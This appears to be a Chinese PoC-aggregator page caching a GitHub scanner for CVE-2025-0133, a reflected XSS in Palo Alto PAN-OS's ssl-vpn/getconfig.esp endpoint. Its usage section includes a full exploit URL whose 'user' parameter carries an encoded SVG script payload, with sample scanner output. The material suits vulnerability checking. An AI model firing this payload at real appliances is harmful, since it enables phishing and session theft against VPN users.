POC详情: e0070779c45ffc4caeb9ad422f1c1e797e6b5858

来源
https://github.com/shawarkhanethicalhacker/CVE-2025-0133-exploit
关联漏洞
标题: Palo Alto Networks PAN-OS 安全漏洞 (CVE-2025-0133)
描述:Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。 Palo Alto Networks PAN-OS存在安全漏洞,该漏洞源于反射型跨站脚本可能导致钓鱼攻击。
介绍

# CVE-2025-0133 Scan

A script written on python just to check the existence of a CVE-2025-0133 Reflected Cross-Site Scripting vulnerability that occurs in Palo Alto. The file `getconfig.esp` is detected and tested for XSS using the given script.

### Usage:
```
darkfear@b0x:~/CVE-2025-0133-exploit$ python3 cve-2025-0133_scan.py -u https://target.com
[*] Sending initial probe to https://target.com/ssl-vpn/getconfig.esp
[+] Target is using "Palo Alto". Testing XSS...
[*] Sending XSS payload...
[+] Target is VULNERABLE to reflected XSS.
[+] URL: https://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
```
文件快照

 [4.0K]  /data/pocs/e0070779c45ffc4caeb9ad422f1c1e797e6b5858
├── [2.6K]  cve-2025-0133_scan.py
└── [ 976]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。